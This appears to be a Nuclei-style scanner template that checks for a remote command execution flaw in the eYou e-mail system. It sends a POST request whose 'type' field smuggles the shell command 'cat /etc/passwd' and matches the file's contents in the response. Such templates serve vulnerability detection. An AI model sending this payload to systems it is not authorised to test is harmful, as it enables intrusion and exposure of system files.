id: eyou-email-rce

info:
  name: eYou E-Mail system RCE
  author: pikpikcu
  severity: critical
  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  tags: rce,eyou

requests:
  - raw:
      - |
        POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type='|cat /etc/passwd||'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body

      - type: status
        status:
          - 200
